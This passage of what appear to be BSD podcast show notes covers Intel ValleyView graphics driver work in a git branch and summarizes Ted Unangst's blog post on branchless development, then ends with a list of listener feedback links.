graphics game, this time with Intel's ValleyView series of CPUs These GPUs are primarily used in the newer Atom CPUs and offer much better performance than the older ones A git branch was created to hold the fixes for now while the last remaining bugs get fixed Fully-accelerated Broadwell support and an update to newer DRM code are also available in the git branch, and will be merged to the main tree after some testing *** Branchless development (http://www.tedunangst.com/flak/post/branchless-development) Ted Unangst has a new blog post up, talking about software branches and the effects of having (or not having) them He covers integrating and merging code, and the versioning problems that can happen with multiple people contributing at once "For an open source project, branching is counter intuitively antisocial. For instance, I usually tell people I'm running OpenBSD, but that's kind of a lie. I'm actually running teduBSD, which is like OpenBSD but has some changes to make it even better. Of course, you can't have teduBSD because I'm selfish. I'm also lazy, and only inclined to make my changes work for me, not everyone else." The solution, according to him, is bringing all the code the developers are using closer together One big benefit is that WIP code gets tested much faster (and bugs get fixed early on) *** Feedback/Questions Matthew writes in (http://slexy.org/view/s21yQtBCCK) Chris writes in (http://slexy.org/view/s21oFA80kY) Anonymous writes in (http://slexy.org/view/s2JYvTlJlm) Bill writes in (http://slexy.org/view/s21LXvk53z) ***